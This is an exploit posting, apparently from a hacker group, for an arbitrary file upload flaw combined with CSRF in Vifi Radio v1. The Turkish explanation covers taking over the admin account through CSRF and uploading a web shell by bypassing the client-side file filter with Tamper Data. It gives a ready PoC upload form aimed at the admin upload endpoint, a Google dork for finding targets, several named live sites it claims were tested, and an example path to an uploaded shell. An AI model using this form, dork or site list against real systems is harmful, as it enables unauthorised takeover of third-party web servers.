.__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/   http://h4x0resec.blogspot.com
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/         
Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html 
|~Official Demo :  http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
Tested on;
http://radyo.vifibilisim.com
www.radyoimza.com
www.bayraklifm.com
www.istanbulfm.net
www.gaziantepfurkanradyo.com
http://iskenderunfm.com
----------------------------------------------------------
BİLGİ : 
Scriptte daha önce keşfedilmiş olan CSRF Zaafiyeti Kullanarak Admin Şifresi değiştirilir ve panele giriş yapılır.
Aşağıda verilen PoC kodlar, "Tamper Data" Eşliğinde Upload süzgecini bypass etmek için kullanıldığında zararlı yazılım doğrudan sunucuya yüklenebilir.
Yüklenen Shell Dosyasının sunucudaki yerini "Tamper Data" zaten iletim esnasında yakalayacaktır.
Alternatif olarak "Anasayfa" üzerinde aşağıda yer alan "Djler" bölümünden shell dosyasının izi sürülebilir.

Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php

----------------------------------------------------------
            Upload.HTML
-----------------------------------------------------------

<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr> <tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td>
      
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>

############################
"Admin Panel: /yonetim "
############################